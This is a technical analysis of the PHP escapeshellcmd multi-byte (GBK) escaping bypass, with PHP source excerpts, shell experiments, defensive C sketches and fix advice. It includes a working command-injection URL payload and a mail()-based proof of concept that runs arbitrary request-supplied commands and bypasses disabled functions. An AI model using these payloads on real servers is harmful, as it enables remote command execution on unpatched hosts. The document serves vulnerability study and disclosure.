PHP escapeshellcmd Multi-Byte Encoding Vulnerability: Analysis and Extensions

Source: Internet
Author: User
Vulnerability advisory: http://www.sektioneins.de/advisories/SE-2008-03.txt

Affected versions:
PHP 5 <= 5.2.5
PHP 4 <= 4.4.8

Systems that allow wide-byte character sets such as GBK, EUC-KR and SJIS can be affected, so the impact is considerable; shared virtual hosts in China are likely to be hit hard. After testing this vulnerability I found it very interesting. I have studied this class of security problem before, so I have written up an explanation of the vulnerability along with some ideas of my own. I also hope that vulnerable platforms in China respond quickly and fix it.
The vulnerability lies in the PHP functions that escape command-line strings. Internally, these functions call php_escape_shell_cmd. Let's look at how it works:

/* {{{ php_escape_shell_cmd
   Escape all chars that could possibly be used to
   break out of a shell command

   This function emalloc's a string and returns the pointer.
   Remember to efree it when done with it.

   *NOT* safe for binary strings
*/
char *php_escape_shell_cmd(char *str) {
    register int x, y, l;
    char *cmd;
    char *p = NULL;

    l = strlen(str);
    cmd = safe_emalloc(2, l, 1);

    for (x = 0, y = 0; x < l; x++) {
        switch (str[x]) {
            case '"':
            case '\'':
#ifndef PHP_WIN32
                if (!p && (p = memchr(str + x + 1, str[x], l - x - 1))) {
                    /* noop */
                } else if (p && *p == str[x]) {
                    p = NULL;
                } else {
                    cmd[y++] = '\\';
                }
                cmd[y++] = str[x];
                break;
#endif
            case '#': /* This is character-set independent */
            case '&':
            case ';':
            case '`':
            case '|':
            case '*':
            case '?':
            case '~':
            case '<':
            case '>':
            case '^':
            case '(':
            case ')':
            case '[':
            case ']':
            case '{':
            case '}':
            case '$':
            case '\\':
            case '\x0A': /* excluding these two */
            case '\xFF':
#ifdef PHP_WIN32
            /* since Windows does not allow us to escape these chars, just remove them */
            case '%':
                cmd[y++] = ' ';
                break;
#endif
                cmd[y++] = '\\';
                /* fall-through */
            default:
                cmd[y++] = str[x];

        }
    }
    cmd[y] = '\0';
    return cmd;
}
/* }}} */

As you can see, PHP prefixes each character that is special on the shell command line (", ', #, &, ; and so on) with a backslash, turning it into \", \', \#, \&, \; and so on, in order to prevent command injection. In PHP's view, once these characters have been escaped, the argument is safe to pass to functions such as system. The usage example in the PHP manual is as follows:

<?php
$e = escapeshellcmd($userinput);

// here we don't care if $e has spaces
system("echo $e");
$f = escapeshellcmd($filename);

// and here we do, so we use quotes
system("touch \"/tmp/$f\"; ls -l \"/tmp/$f\"");
?>

Clearly, if the input were not passed through escapeshellcmd and the user entered hello;id, the system would execute the following command:

echo hello;id

The shell splits this into two commands: it not only echoes hello but also runs id, which is a command injection vulnerability. After escapeshellcmd, the command becomes:

echo hello\;id

Now only echo is executed, and everything after it is an argument to echo, which is safe.
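
The effect of this byte-by-byte escaping can be sketched in a few lines of C. This is a simplified illustration, not PHP's code: escape_meta_bytes is a hypothetical name, it uses malloc instead of emalloc, and it covers only a small subset of the metacharacters and none of the quote-pairing logic.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, simplified stand-in for php_escape_shell_cmd:
 * prefixes a few shell metacharacters with a backslash, one byte
 * at a time. The caller must free() the result. */
char *escape_meta_bytes(const char *str)
{
    assert(str != NULL);
    size_t len = strlen(str);
    /* Worst case: every byte gains a backslash, plus the terminator. */
    char *out = malloc(2 * len + 1);
    size_t y = 0;

    if (out == NULL) {
        return NULL;
    }
    for (size_t x = 0; x < len; x++) {
        /* Subset of the metacharacters handled by the PHP function. */
        if (strchr(";&|`$\\", str[x]) != NULL) {
            out[y++] = '\\';
        }
        out[y++] = str[x];
    }
    out[y] = '\0';
    return out;
}
```

Called with hello;id, this sketch returns hello\;id. A byte such as 0xbf is copied unchanged, because the loop never considers that it might be the first half of a wider character.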

But is that really the case? After escaping the argument, PHP does nothing more than hand it to system; the rest of the work is done by Linux. How does Linux process the argument? When a command runs on Linux, environment variables describe the working environment: PWD is the current working directory, UID is your identity, BASH is the command interpreter, and so on. One very important variable is LANG, which determines how the shell interprets your input, so that when you type Chinese characters, for example, the system understands them the way you intended. By default, LANG is usually en_US.UTF-8. UTF-8 is a very safe character set: its byte sequences are self-validating, so this kind of error does not occur. Some systems, however, use other multi-byte character sets such as GBK, which is the most common case in China. If you set LANG=zh_CN.GBK, your input is processed as GBK. GBK is a double-byte encoding, and every valid GBK byte pair is treated as a single character.
As we saw, PHP processes its input one byte at a time, treating it purely as a byte stream, whereas a Linux shell with a GBK locale processes it two bytes at a time. The two clearly do not agree on what the input means. GBK code points range from 0x8140 to 0xFEFE: the first byte lies in 0x81-0xFE and the second byte in 0x40-0xFE. The all-important backslash is encoded as 0x5C, which falls within the second-byte range. Now consider this special input:

0xbf;id
or 0xbf'id

After escapeshellcmd escapes it byte by byte, it becomes:

0xbf5c;id
0xbf5c'id

Note that 0xbf5c is a valid GBK character, so when Linux executes the command, the input is read as:

[0xbf5c];id
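
The disagreement can be reproduced without a shell. The sketch below scans an already-escaped byte string for a semicolon that is not protected by a backslash, once treating every byte as a character and once grouping GBK double-byte characters first. first_live_semicolon and is_gbk_pair are hypothetical helpers, and the GBK test (lead byte 0x81-0xFE, trail byte 0x40-0xFE except 0x7F) is a simplification of what a real shell and locale do.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if bytes a,b form a GBK double-byte character
 * (simplified range check only). */
static int is_gbk_pair(unsigned char a, unsigned char b)
{
    return a >= 0x81 && a <= 0xFE && b >= 0x40 && b <= 0xFE && b != 0x7F;
}

/* Hypothetical helper: index of the first ';' that is not preceded by
 * an escaping backslash, or -1 if there is none. With gbk != 0, GBK
 * double-byte characters are consumed as single units first. */
long first_live_semicolon(const unsigned char *s, size_t n, int gbk)
{
    assert(s != NULL);
    size_t i = 0;

    while (i < n) {
        if (gbk && i + 1 < n && is_gbk_pair(s[i], s[i + 1])) {
            i += 2;             /* one wide character, trail byte included */
        } else if (s[i] == '\\' && i + 1 < n) {
            i += 2;             /* backslash escapes the next byte */
        } else if (s[i] == ';') {
            return (long)i;     /* unescaped command separator */
        } else {
            i++;
        }
    }
    return -1;
}
```

For the escaped bytes BF 5C 3B 69 64, the byte-wise scan (gbk = 0) finds no live semicolon, while the GBK scan (gbk = 1) reports the one at index 2, because 5C has been absorbed into the character BF5C.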

In other words, the trailing id is executed. A simple experiment confirms this:

[loveshell@loveshell tmp]$ echo 縗
>
?
[loveshell@loveshell tmp]$ set | grep -i lang
LANG=zh_CN.GB2312
LANGVAR=en_US.UTF-8
[loveshell@loveshell tmp]$ export LANG=zh_CN.GBK
[loveshell@loveshell tmp]$ echo 縗
縗
[loveshell@loveshell tmp]$ set | grep -i lang
LANG=zh_CN.GBK
LANGVAR=en_US.UTF-8
[loveshell@loveshell tmp]$

The character 縗 is encoded as 0xbf5c. Before LANG is set to GBK, these bytes are not a valid GB2312 character, so they are treated as two separate characters; the 0x5c takes effect as a backslash and the shell considers the command unfinished. Once LANG is set to GBK, the two bytes are treated as a single character and echoed.
How can we demonstrate the vulnerability in PHP?

<?php
$e = escapeshellcmd($_GET['c']);
// here we don't care if $e has spaces
system("echo $e");
?>

The code above works fine under normal circumstances. If we submit

exp.php?c=loveshell%bf;id

the result returned is

loveshell?;id

Now let's change the code slightly:

<?php
putenv("LANG=zh_CN.GBK");
$e = escapeshellcmd($_GET['c']);
// here we don't care if $e has spaces
system("echo $e");
?>

PHP's putenv function modifies the environment variables of the running PHP process. With LANG changed, submit the same parameter again and you will see:

loveshell nobody uid=99(nobody) gid=4294967295 groups=4294967295

The command is executed. Here we had to set the environment variable ourselves, but some machines already have LANG set to GBK, so any of them that rely on escapeshellcmd to filter input may be vulnerable. The root cause is that Linux and PHP do not interpret the argument in the same way. PHP's mail function is a further example: internally it still has the system run the sendmail command, and it lets the caller append extra arguments to that command. Those arguments are escaped, but on a machine with a multi-byte locale the escaping can be bypassed.
Here are some fragments of the mail function:

......
    if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect.  The fifth parameter is disabled in SAFE MODE.");
        RETURN_FALSE;
    }

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss",
                &to, &to_len,
                &subject, &subject_len,
                &message, &message_len,
                &headers, &headers_len,
                &extra_cmd, &extra_cmd_len
                ) == FAILURE) {
        return;
    }
......

    if (force_extra_parameters) {
        extra_cmd = estrdup(force_extra_parameters);
    } else if (extra_cmd) {
        extra_cmd = php_escape_shell_cmd(extra_cmd);
    }

    if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) {
        RETVAL_TRUE;
    } else {
        RETVAL_FALSE;
    }
.....

If safe mode is not in effect, the fifth parameter is allowed. It is passed in as extra_cmd, escaped by php_escape_shell_cmd, and handed to php_mail as its fifth argument. The relevant fragment of php_mail is:

......
    if (extra_cmd != NULL) {
        sendmail_cmd = emalloc(strlen(sendmail_path) + strlen(extra_cmd) + 2);
        strcpy(sendmail_cmd, sendmail_path);
        strcat(sendmail_cmd, " ");
        strcat(sendmail_cmd, extra_cmd);
    } else {
        sendmail_cmd = sendmail_path;
    }

#ifdef PHP_WIN32
    sendmail = popen(sendmail_cmd, "wb");
#else
    /* Since popen() doesn't indicate if the internal fork() doesn't work
     * (e.g. the shell can't be executed) we explicitely set it to 0 to be
     * sure we don't catch any older errno value. */
    errno = 0;
    sendmail = popen(sendmail_cmd, "w");
......

extra_cmd is appended to the sendmail path as an argument. This means the vulnerability can be used to execute commands even in environments where dangerous functions such as system are disabled. Here is the PoC I wrote:

<?php
// PHP disable function bypass vul
// by Stefan Esser
// POC by loveshell

putenv("LANG=zh_CN.GBK");
// the payload goes in the fifth argument (extra parameters) of mail()
mail("loveshell@loveshell.net", "", "", "", "xxxx" . chr(0xbf) . ";" . $_GET['c']);
?>

It runs on machines that support GBK; other character sets should behave the same way and need only slight changes. As for a fix, upgrade to a new version as soon as possible, or add the mail function to your list of disabled functions.
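
To illustrate what an encoding-aware escaping routine might look like, here is a minimal sketch that steps over complete GBK characters instead of individual bytes. It is an assumption-laden illustration, not the actual PHP patch: escape_meta_gbk and gbk_pair are hypothetical names, the GBK check is a simple range test, and only a subset of the metacharacters is handled.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Simplified GBK range check: lead 0x81-0xFE, trail 0x40-0xFE except 0x7F. */
static int gbk_pair(unsigned char a, unsigned char b)
{
    return a >= 0x81 && a <= 0xFE && b >= 0x40 && b <= 0xFE && b != 0x7F;
}

/* Hypothetical encoding-aware variant: copies GBK double-byte characters
 * untouched, drops a lead byte that has no valid trail byte, and escapes
 * a subset of shell metacharacters. The caller must free() the result. */
char *escape_meta_gbk(const char *str)
{
    assert(str != NULL);
    const unsigned char *s = (const unsigned char *)str;
    size_t len = strlen(str);
    char *out = malloc(2 * len + 1);
    size_t y = 0;

    if (out == NULL) {
        return NULL;
    }
    for (size_t x = 0; x < len; x++) {
        if (x + 1 < len && gbk_pair(s[x], s[x + 1])) {
            out[y++] = str[x];      /* lead byte */
            x++;
            out[y++] = str[x];      /* trail byte, never escaped */
        } else if (s[x] >= 0x81 && s[x] <= 0xFE) {
            continue;               /* stray lead byte: drop it */
        } else {
            if (strchr(";&|`$\\", str[x]) != NULL) {
                out[y++] = '\\';
            }
            out[y++] = str[x];
        }
    }
    out[y] = '\0';
    return out;
}
```

With this sketch, the input 0xbf;id loses its stray 0xbf and becomes \;id, so the backslash can no longer be swallowed. Note that this only helps if the shell really runs with a GBK locale; under a different locale, trail bytes such as ` (0x60) or | (0x7c) that were copied unescaped would be seen as metacharacters again.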
In essence, this vulnerability is caused by two components interpreting the same data differently, and the shadow of earlier problems is easy to recognise here. PHP and MySQL disagreeing on how to process data leads to SQL injection; a program and the browser disagreeing on how to process HTML leads to XSS; inconsistent processing of XML leads to XML injection. Here, the command injection comes from a disagreement with the Linux shell. Other scripting languages such as Perl can be expected to have similar problems wherever character sets are involved. The character set determines how a system interprets its input, and different character sets yield different interpretations. In some character sets, special characters such as \, ` and | can cause problems whenever they fall within the second-byte range, for example:

SJIS
[\x20-\x7e]|[\xa1-\xdf]|([\x81-\x9f]|[\xe0-\xef])([\x40-\x7e]|[\x80-\xfc])

\x40-\x7e includes \x5c, which is what causes the problem. When designing a program that interacts with programs or protocols at other layers, we should take this into account and make sure both sides handle the data consistently. Thanks again to Stefan Esser. Stefan Esser is my hero! :)
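
Which metacharacters are exposed in a given character set can be checked mechanically. The sketch below encodes the SJIS trail-byte range from the pattern above and filters a list of shell metacharacters against it; sjis_risky_metas is a hypothetical helper name used only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Trail-byte range of a double-byte SJIS character, taken from the
 * pattern above: [\x40-\x7e] | [\x80-\xfc]. */
int sjis_is_trail(unsigned char b)
{
    return (b >= 0x40 && b <= 0x7E) || (b >= 0x80 && b <= 0xFC);
}

/* Hypothetical helper: copies into out every byte of metas that can also
 * appear as an SJIS trail byte and returns how many were copied.
 * out must have room for strlen(metas) + 1 bytes. */
size_t sjis_risky_metas(const char *metas, char *out)
{
    assert(metas != NULL && out != NULL);
    size_t len = strlen(metas);
    size_t n = 0;

    for (size_t i = 0; i < len; i++) {
        if (sjis_is_trail((unsigned char)metas[i])) {
            out[n++] = metas[i];
        }
    }
    out[n] = '\0';
    return n;
}
```

Given the metacharacters ; & ' " \ | ` $, the helper keeps only \, | and `: these are the bytes that a preceding lead byte could absorb, while ; and the quote characters lie below 0x40 and cannot be a trail byte.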
